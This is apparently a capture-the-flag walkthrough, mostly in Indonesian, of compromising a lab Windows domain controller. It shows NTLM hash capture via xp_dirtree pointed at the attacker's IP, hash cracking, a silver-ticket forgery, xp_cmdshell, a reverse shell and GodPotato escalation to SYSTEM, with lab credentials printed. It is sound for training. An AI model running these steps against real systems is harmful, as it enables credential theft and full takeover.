Escape

Information Gathering

Port and Service

# nmap -p- -sVC --min-rate 1000 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.35s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-22 16:06:55Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-04-22T16:08:29+00:00; +8h00m00s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.202:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-22T16:03:42
|_Not valid after:  2055-04-22T16:03:42
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:08:29+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:08:29+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
49723/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-22T16:07:49
|_  start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s

Initial Access - PublicUser

SMB Anonymous access

Disini saya mencoba melakukan SMB Anonymous access dan menemukan terdapat folder yang menarik yaitu folder "Public"

┌──(me㉿kali)-[~/ctf/escape]
└─$ smbclient -L //sequel.htb 
Password for [WORKGROUP\me]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to sequel.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

disini saya langsung connect ke SMB untuk melihat isi dari folder public tersebut

┌──(me㉿kali)-[~/ctf/escape]
└─$ smbclient //sequel.htb/public
Password for [WORKGROUP\me]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 18:51:25 2022
  ..                                  D        0  Sat Nov 19 18:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 20:39:43 2022

                5184255 blocks of size 4096. 1439016 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (21.3 KiloBytes/sec) (average 21.3 KiloBytes/sec)
smb: \> exit

didalam folder tersebut terdapat file "SQL Server Procedures.pdf", selanjutnya saya transfer file tersebut ke lokal dan disini saya mendapatkan credential

PublicUser:GuestUserCantWrite1

sesuai dengan informasi pada pdf tersebut credential tersebut digunakan untuk SQL Server, disini saya akan mengaksesnya menggunakan impacket-mssqlclient

┌──(me㉿kali)-[~/ctf/escape]
└─$ impacket-mssqlclient sequel.htb/publicuser:"GuestUserCantWrite1"@sequel.htb

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)>

disini saya berhasil masuk.

Sql_svc Via NTLM Poisoning

disini user tersebut memiliki akses terbatas, akan tetapi dapat menjalankan xp_dirtree. disini saya akan melakukan NTLM Poisoning dengan Responder

Capturing sql_svc NTLMv2

pertama saya menjalankan listener responder di terminal

# run responder 
┌──(me㉿kali)-[~/ctf/escape]
└─$ sudo responder -I tun0

selanjutnya saya menjalankan xp_dirtree \\10.10.14.5\s (IP address saya)

┌──(me㉿kali)-[~/ctf/escape]
└─$ impacket-mssqlclient sequel.htb/publicuser:"GuestUserCantWrite1"@sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)> xp_dirtree \\10.10.14.5\s
subdirectory   depth   file   
------------   -----   ----   
SQL (PublicUser  guest@master)>

pada responder, disini terdapat sebuah event yang masuk, ini adalah NTLM dari sql_svc

# Responder event / listener
[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:b82f9b22b01edd96:8596420AD4CC7CC5AE88283F169F18E3:01010000000000000008A9D399B3DB016B396109E630181E00000000020008004B0034004A00560001001E00570049004E002D005000580035003800550053005A00430045003500320004003400570049004E002D005000580035003800550053005A0043004500350032002E004B0034004A0056002E004C004F00430041004C00030014004B0034004A0056002E004C004F00430041004C00050014004B0034004A0056002E004C004F00430041004C00070008000008A9D399B3DB01060004000200000008003000300000000000000000000000003000003EE27BCBD5F3875E4929B668596433BF151E33B92CB0FE2CC2A27277CFA816AA0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000

selanjutnya saya akan crack NTLMv2 tersebut dengan menggunakan hashcat

┌──(me㉿kali)-[~/ctf/escape]
└─$ hashcat hash  /usr/share/wordlists/rockyou.txt
[--- SNIP ---]
SQL_SVC::sequel:b82f9b22b01edd96:8596420ad4cc7cc5ae88283f169f18e3:01010000000000000008a9d399b3db016b396109e630181e00000000020008004b0034004a00560001001e00570049004e002d005000580035003800550053005a00430045003500320004003400570049004e002d005000580035003800550053005a0043004500350032002e004b0034004a0056002e004c004f00430041004c00030014004b0034004a0056002e004c004f00430041004c00050014004b0034004a0056002e004c004f00430041004c00070008000008a9d399b3db01060004000200000008003000300000000000000000000000003000003ee27bcbd5f3875e4929b668596433bf151e33b92cb0fe2cc2a27277cfa816aa0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0035000000000000000000:REGGIE1234ronnie
[--- SNIP ---]

disini saya berhasil cracking hash tersebut

sql_svc:REGGIE1234ronnie

disini saya mencoba untuk terkoneksi menggunakn impacket-mssqlclient

┌──(me㉿kali)-[~/ctf/escape]
└─$ impacket-mssqlclient sequel.htb/[email protected] -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sequel\sql_svc  guest@master)> enable_xp_cmdshell
ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (sequel\sql_svc  guest@master)>

sayangnya disini saya tidak dapat melakukan command execution, selanjutnya saya mencoba memeriksa apakah user tersebut bisa untuk winrm atau tidak

┌──(me㉿kali)-[~/ctf/escape]
└─$ nxc winrm sequel.htb -u sql_svc -p 'REGGIE1234ronnie'
WINRM       10.10.11.202    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)

user tersebut dapat digunakan untuk winrm

┌──(me㉿kali)-[~/ctf/escape]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie                                                  
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>

Administrator Via Silver Ticket and Godpotato

Disini saya memeriksa Privilege Information current user (sql_svc)

*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\sql_svc\Documents>

tidak ada yang menarik. disini saya akan mencoba silver ticket untuk menaikan hak aksesnya, saya melakukan silver ticket karena saya pikir user ini memiliki spn dan berjalan pada mssql. sebetulnya ini menjadi salah satu hal yang menarik, dikutip dari 0xdf writeup bahwa sql_svc dapat digunakan untuk silver ticket untuk alasan yang tidak disengaja

disini saya juga sudah memastikan user spn yang terdapat pada mesin tersebut dan hasilnya saya tidak menemukan spn sql_svc

Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | Select-Object ServicePrincipalName

get-domainuser -spn

Get-ADUser -Filter {SamAccountName -eq "sql_svc"}

lanjut, disini saya membuat TGS ticket dengan menggunakan impacket-ticketer. sebelum menggunakan impacket-ticketer saya membutuhkan beberapa informasi seperti

User NTLM
Domain SID
spn (optional)

User NTLM

┌──(me㉿kali)-[~/ctf/escape]
└─$ python -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "REGGIE1234ronnie".encode("utf-16le")).digest()))'
b'1443ec19da4dac4ffc953bca1b57b4cf'

Domain SID

*Evil-WinRM* PS C:\Users\sql_svc\Documents> . .\pv.ps1
*Evil-WinRM* PS C:\Users\sql_svc\Documents> get-domainsid
S-1-5-21-4078382237-1492182817-2568127209
*Evil-WinRM* PS C:\Users\sql_svc\Documents>

Create Ticket

impacket-ticketer -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -nthash 1443ec19da4dac4ffc953bca1b57b4cf -dc-ip 10.10.11.202 -domain dc.sequel.htb administrator

bisa juga menggunakan

impacket-ticketer -spn asdasdasd/dc.sequel.htb -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -nthash 1443ec19da4dac4ffc953bca1b57b4cf -dc-ip 10.10.11.202 -domain dc.sequel.htb administrator

kemudian sinkronasi timedatenya untuk kerberos

sudo timedatectl set-ntp off
sudo ntpdate 10.10.11.202

selanjutnya connect ke mssql dengan impacket-mssqlclient dan argument -k untuk menggunakan kerberos authentication

┌──(me㉿kali)-[~/ctf/escape]
└─$ export KRB5CCNAME=administrator.ccache                                                                                                                                  
                                                                                                                                                                                                                                            
┌──(me㉿kali)-[~/ctf/escape]
└─$ impacket-mssqlclient -k dc.sequel.htb                                                                                                                                   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sequel\Administrator  dbo@master)>

berhasil terkoneksi ke mssql sebagai Administrator, selanjutnya saya melakukan verifikasi privilegenya

SQL (sequel\Administrator  dbo@master)> enable_xp_cmdshell
INFO(DC\SQLMOCK): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC\SQLMOCK): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sequel\Administrator  dbo@master)> xp_cmdshell "whoami /priv"
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               

PRIVILEGES INFORMATION                                                             

----------------------                                                             

NULL                                                                               

Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   

SeMachineAccountPrivilege     Add workstations to domain                Disabled   

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    

SeImpersonatePrivilege        Impersonate a client after authentication Enabled    

SeCreateGlobalPrivilege       Create global objects                     Enabled    

SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   

NULL                                                                               

SQL (sequel\Administrator  dbo@master)> xp_cmdshell "whoami"
output           
--------------   
sequel\sql_svc   

NULL             

SQL (sequel\Administrator  dbo@master)>

dapat dilihat pada output tersebut disini user tersebut telah memiliki SeImpersonatePrivilege yang memungkinkan saya melakukan abuse terhadap privilege tersebut dengan Godpotato.

sebelumnya untuk kemudahan menjalankan perintah saya melakukan reverse shell dengan memunggah nc.exe kemudian saya juga memunggah godpotato.exe.

part terakhir, disini saya akan menjalankan godpotato.exe

C:\Users\sql_svc\Documents>godpotato.exe -cmd "cmd /c whoami"
godpotato.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140730125516800
[*] DispatchTable: 0x140730127830208
[*] UseProtseqFunction: 0x140730127206992
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\92f2e2c7-b393-44ee-b7c4-7c6d42a9d627\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00005c02-0868-ffff-4b09-04224efae8cf
[*] DCOM obj OXID: 0x6d360bb7088891b9
[*] DCOM obj OID: 0x63a4aa18a1bb13b6
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 892 Token:0x800  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4340
nt authority\system

C:\Users\sql_svc\Documents>

disini saya telah berhasil mendapatkan nt authority\system

PreviousMedium NextAdministrator

Last updated 7 months ago